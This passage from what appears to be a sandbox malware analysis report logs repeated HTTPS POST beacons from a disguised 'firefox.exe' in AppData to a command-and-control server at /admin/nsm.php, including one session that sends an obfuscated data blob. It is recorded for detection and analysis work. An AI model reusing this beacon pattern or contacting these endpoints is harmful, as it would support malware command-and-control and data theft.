2018-05-07 12:49:54 UTC 496 IN Data Raw: 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 39 65 63 39 62 Data Ascii: 9434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9be34fd447911df7464ecd88bd89434f6c10c9ec9b
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
10 192.168.1.81 49175 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Copyright Joe Security LLC 2018 Page 69 of 149
TimestampkBytestransferred Direction Data
2018-05-07 12:50:28 UTC 508 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:28 UTC 508 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:28 UTC 508 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:28 UTC 508 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
11 192.168.1.81 49176 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:30 UTC 508 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:30 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:30 UTC 509 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:30 UTC 509 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
12 192.168.1.81 49177 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:32 UTC 509 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:32 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:32 UTC 509 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:32 UTC 509 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
13 192.168.1.81 49178 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:33 UTC 509 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:33 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:33 UTC 509 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:33 UTC 509 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Copyright Joe Security LLC 2018 Page 70 of 149
Session ID Source IP Source Port Destination IP Destination Port Process
14 192.168.1.81 49179 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:34 UTC 509 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:34 UTC 509 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:35 UTC 509 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:35 UTC 510 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
15 192.168.1.81 49180 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:36 UTC 510 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:36 UTC 510 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:36 UTC 510 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:36 UTC 510 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
16 192.168.1.81 49181 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:37 UTC 510 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:37 UTC 510 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:38 UTC 510 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:38 UTC 510 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
17 192.168.1.81 49182 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:38 UTC 510 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:38 UTC 510 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:39 UTC 510 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Copyright Joe Security LLC 2018 Page 71 of 149
2018-05-07 12:50:39 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
18 192.168.1.81 49183 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:40 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:40 UTC 511 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:40 UTC 511 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:40 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
19 192.168.1.81 49184 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:41 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:41 UTC 511 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:41 UTC 511 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:41 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
2 192.168.1.81 49165 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:49:59 UTC 505 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 0Cache-Control: no-cache
2018-05-07 12:49:59 UTC 505 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:49:59 UTC 506 IN Data Raw: 32 38 0d 0a 39 65 63 39 62 65 33 34 66 64 34 34 37 39 31 31 64 66 37 34 36 34 65 63 64 38 38 62 64 38 39 34 33 34 66 36 63 31 30 63 0d 0a 30 0d 0a 0d 0a Data Ascii: 289ec9be34fd447911df7464ecd88bd89434f6c10c0
Session ID Source IP Source Port Destination IP Destination Port Process
20 192.168.1.81 49185 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:42 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:42 UTC 511 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
Copyright Joe Security LLC 2018 Page 72 of 149
2018-05-07 12:50:43 UTC 511 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:43 UTC 511 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
21 192.168.1.81 49186 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:44 UTC 511 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:44 UTC 512 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:44 UTC 512 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:44 UTC 512 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
22 192.168.1.81 49187 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:45 UTC 512 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:45 UTC 512 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:45 UTC 512 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:45 UTC 512 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
23 192.168.1.81 49188 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:46 UTC 512 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:46 UTC 512 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:47 UTC 512 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:47 UTC 512 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
24 192.168.1.81 49189 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Copyright Joe Security LLC 2018 Page 73 of 149
TimestampkBytestransferred Direction Data
2018-05-07 12:50:47 UTC 512 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:47 UTC 512 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:48 UTC 512 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:48 UTC 513 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
25 192.168.1.81 49190 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:49 UTC 513 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:49 UTC 513 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:50 UTC 513 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:50 UTC 513 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
26 192.168.1.81 49191 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:50 UTC 513 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:50 UTC 513 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:51 UTC 513 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:51 UTC 513 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
27 192.168.1.81 49192 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:51 UTC 513 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:51 UTC 513 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:52 UTC 513 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:52 UTC 513 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Copyright Joe Security LLC 2018 Page 74 of 149
Session ID Source IP Source Port Destination IP Destination Port Process
28 192.168.1.81 49193 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:53 UTC 513 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:53 UTC 514 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:53 UTC 514 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:53 UTC 514 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
29 192.168.1.81 49194 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:54 UTC 514 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:54 UTC 514 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:55 UTC 514 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:55 UTC 514 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
3 192.168.1.81 49167 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:01 UTC 506 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 458Cache-Control: no-cache
2018-05-07 12:50:01 UTC 506 OUT Data Raw: 4a 0a 05 4d 1e 57 4f 1a 15 0b 58 14 72 5d 58 45 0b 14 17 05 18 05 4b 53 4a 09 35 68 25 5c 56 56 56 14 20 5a 02 42 58 43 69 09 02 40 07 17 13 05 50 44 75 57 43 50 47 54 3c 6b 3d 75 52 5b 07 06 44 7e 54 03 17 50 19 64 5f 55 1f 53 11 11 01 55 19 2b 33 78 32 2c 3e 3e 21 0b 5b 53 5b 5c 11 72 0c 14 58 59 53 39 6f 2e 0b 42 51 0e 08 59 19 72 5a 46 03 50 0c 49 10 57 0a 4b 53 17 53 45 1b 4c 5e 52 14 51 59 14 64 62 4d 6b 3d 79 59 4e 0c 0f 08 59 18 2f 05 51 57 40 56 5a 07 58 00 54 10 30 5c 17 15 50 01 00 3e 3e 2b 0d 57 46 58 4a 5e 57 10 46 78 52 50 5d 06 06 44 70 57 0f 01 18 58 5a 57 14 24 43 10 58 5e 06 4a 16 43 0b 52 54 03 39 6c 2e 55 42 56 19 09 11 31 16 53 55 42 51 45 57 54 35 32 21 0b 55 49 55 47 5d 04 5f 0f 58 44 1a 19 35 02 5a 09 45 55 5b 14 44 40 5c 52 19 03 Data Ascii: JMWOXr]XEKSJ5h%\VVV ZBXCi@PDuWCPGT<k=uR[D~TPd_USU+3x2,>>![S[\rXYS9o.BQYrZFPIWKSSEL RQYdbMk=yYNY/QW@VZXT0\P>>+WFXJ WFxRP]DpWXZW$CX JCRT9l.UBV1SUBQEWT52!UIUG]_XD5ZEU[D@\R
2018-05-07 12:50:01 UTC 506 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:50:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:01 UTC 506 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
30 192.168.1.81 49195 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:56 UTC 514 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
Copyright Joe Security LLC 2018 Page 75 of 149
2018-05-07 12:50:56 UTC 514 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:57 UTC 514 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:57 UTC 514 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
TimestampkBytestransferred Direction Data
Session ID Source IP Source Port Destination IP Destination Port Process
31 192.168.1.81 49196 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:58 UTC 514 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:50:58 UTC 514 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:50:59 UTC 514 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:50:59 UTC 515 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
32 192.168.1.81 49197 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:00 UTC 515 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:00 UTC 515 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:01 UTC 515 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:01 UTC 515 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
33 192.168.1.81 49198 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:02 UTC 515 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:02 UTC 515 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:03 UTC 515 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:03 UTC 515 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
34 192.168.1.81 49199 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
Copyright Joe Security LLC 2018 Page 76 of 149
TimestampkBytestransferred Direction Data
2018-05-07 12:51:05 UTC 515 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:05 UTC 515 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:05 UTC 515 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:05 UTC 516 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
35 192.168.1.81 49200 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:06 UTC 516 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:06 UTC 516 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:07 UTC 516 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:07 UTC 516 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
36 192.168.1.81 49201 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:08 UTC 516 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:08 UTC 516 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:09 UTC 516 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:09 UTC 516 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
37 192.168.1.81 49202 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:09 UTC 516 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:09 UTC 516 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:10 UTC 516 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:10 UTC 516 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Copyright Joe Security LLC 2018 Page 77 of 149
Session ID Source IP Source Port Destination IP Destination Port Process
38 192.168.1.81 49203 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:11 UTC 516 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:11 UTC 517 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:11 UTC 517 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:11 UTC 517 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
39 192.168.1.81 49204 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:51:12 UTC 517 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 7Cache-Control: no-cache
2018-05-07 12:51:12 UTC 517 OUT Data Raw: 49 0c 0d 5e 1e 50 03 Data Ascii: I P
2018-05-07 12:51:12 UTC 517 IN HTTP/1.1 200 OKServer: nginx/1.6.2Date: Mon, 07 May 2018 12:51:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
2018-05-07 12:51:12 UTC 517 IN Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Session ID Source IP Source Port Destination IP Destination Port Process
4 192.168.1.81 49168 91.92.137.74 443 C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe
TimestampkBytestransferred Direction Data
2018-05-07 12:50:18 UTC 506 OUT POST /admin/nsm.php?F48A04623C4E0000 HTTP/1.1Host: truand-2-la-galere.moneyContent-Length: 35Cache-Control: no-cache
